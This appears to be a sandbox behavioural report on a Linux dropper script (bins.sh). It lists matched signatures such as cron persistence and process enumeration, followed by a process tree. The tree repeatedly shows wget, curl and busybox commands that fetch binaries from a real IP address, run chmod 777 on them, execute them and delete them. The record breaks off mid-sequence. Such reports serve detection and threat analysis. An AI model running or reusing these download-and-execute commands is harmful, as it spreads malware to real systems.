N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.ZdiLay /usr/bin/crontab N/A

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/907/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/975/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/82/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/36/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/983/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/71/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/81/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/390/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/684/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/706/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/919/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/2/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/11/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/933/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/1015/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/6/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/121/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/968/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/16/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/905/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/946/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/970/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/707/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/953/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/989/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/5/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/22/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/899/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/902/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/913/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/940/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/969/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/20/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/704/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/24/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/676/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/10/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/15/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/73/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/375/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/685/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/912/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/962/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/17/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/976/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/993/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/998/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/1004/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/391/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/231/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/896/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/920/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/963/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/967/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/1/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
File opened for reading /proc/75/cmdline /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /bin/busybox N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/wget N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/wget N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/wget N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/wget N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/wget N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/wget N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/wget N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/wget N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /bin/busybox N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /bin/busybox N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/wget N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /bin/busybox N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /bin/busybox N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /bin/busybox N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /bin/busybox N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /bin/busybox N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/wget N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /bin/busybox N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /bin/busybox N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /bin/busybox N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /bin/busybox N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/sh

[sh -c crontab -l]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c crontab -]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

